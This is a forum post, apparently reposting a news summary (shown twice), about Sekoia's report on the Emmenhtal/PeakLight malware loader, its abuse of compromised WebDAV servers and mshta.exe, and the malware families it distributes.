Friend
Professional
- Messages
- 2,653
- Reaction score
- 850
- Points
- 113
How cybercriminals use legitimate technologies for their own purposes.
Sekoia has published a report that describes a relatively new malware downloader service called Emmenhtal. The main feature of this malware is the use of compromised WebDAV servers to host its clients' payloads.
Emmenhtal, also known as PeakLight, distributes various malware threats, such as infostealers, around the world. Since its launch in December 2023, it has been actively attracting the attention of cybersecurity professionals due to its secretive approach. The loader functions exclusively in memory, which makes it difficult to detect and analyze.
The Sekoia team investigated the infrastructure used to distribute Emmenhtal and found that the malicious files were hosted on WebDAV servers. WebDAV, being an extension of the HTTP protocol, allows you to manage files on web servers, which makes it useful for legal tasks. However, attackers are increasingly using this technology for their own purposes. As part of this scheme, users are redirected to a WebDAV server, where malware is downloaded through specially prepared files such as «.lnk.
Particular attention is drawn to the method of distribution through the use of the legitimate system file «mshta.exe", which is designed to execute HTML applications. Using these trusted system files allows attackers to bypass security mechanisms and hide their actions. In the analyzed Sekoia infrastructure, more than 100 WebDAV servers were identified through which malicious files are distributed.
In addition, experts have found that various malware families are being distributed through this infrastructure, including SelfAU3, DarkGate, Amadey, and others. This suggests that the infrastructure can be offered as a service to other attackers, providing the ability to rent servers and tools to host and deliver malware.
For several months, Emmenhtal's infrastructure used the same autonomous systems (AS) to host WebDAV servers, which may indicate the centralized nature of this operation. Among the AS used were Terasyst Ltd, Zonata, and others, which may indicate reliable agreements with providers.
Sekoia's findings indicate that Emmenhtal's infrastructure is likely a commercial service provided by the cybercriminal group. It offers an infrastructure for hosting and distributing many different types of malware.
Source
Sekoia has published a report that describes a relatively new malware downloader service called Emmenhtal. The main feature of this malware is the use of compromised WebDAV servers to host its clients' payloads.
Emmenhtal, also known as PeakLight, distributes various malware threats, such as infostealers, around the world. Since its launch in December 2023, it has been actively attracting the attention of cybersecurity professionals due to its secretive approach. The loader functions exclusively in memory, which makes it difficult to detect and analyze.
The Sekoia team investigated the infrastructure used to distribute Emmenhtal and found that the malicious files were hosted on WebDAV servers. WebDAV, being an extension of the HTTP protocol, allows you to manage files on web servers, which makes it useful for legal tasks. However, attackers are increasingly using this technology for their own purposes. As part of this scheme, users are redirected to a WebDAV server, where malware is downloaded through specially prepared files such as «.lnk.
Particular attention is drawn to the method of distribution through the use of the legitimate system file «mshta.exe", which is designed to execute HTML applications. Using these trusted system files allows attackers to bypass security mechanisms and hide their actions. In the analyzed Sekoia infrastructure, more than 100 WebDAV servers were identified through which malicious files are distributed.
In addition, experts have found that various malware families are being distributed through this infrastructure, including SelfAU3, DarkGate, Amadey, and others. This suggests that the infrastructure can be offered as a service to other attackers, providing the ability to rent servers and tools to host and deliver malware.
For several months, Emmenhtal's infrastructure used the same autonomous systems (AS) to host WebDAV servers, which may indicate the centralized nature of this operation. Among the AS used were Terasyst Ltd, Zonata, and others, which may indicate reliable agreements with providers.
Sekoia's findings indicate that Emmenhtal's infrastructure is likely a commercial service provided by the cybercriminal group. It offers an infrastructure for hosting and distributing many different types of malware.
Source
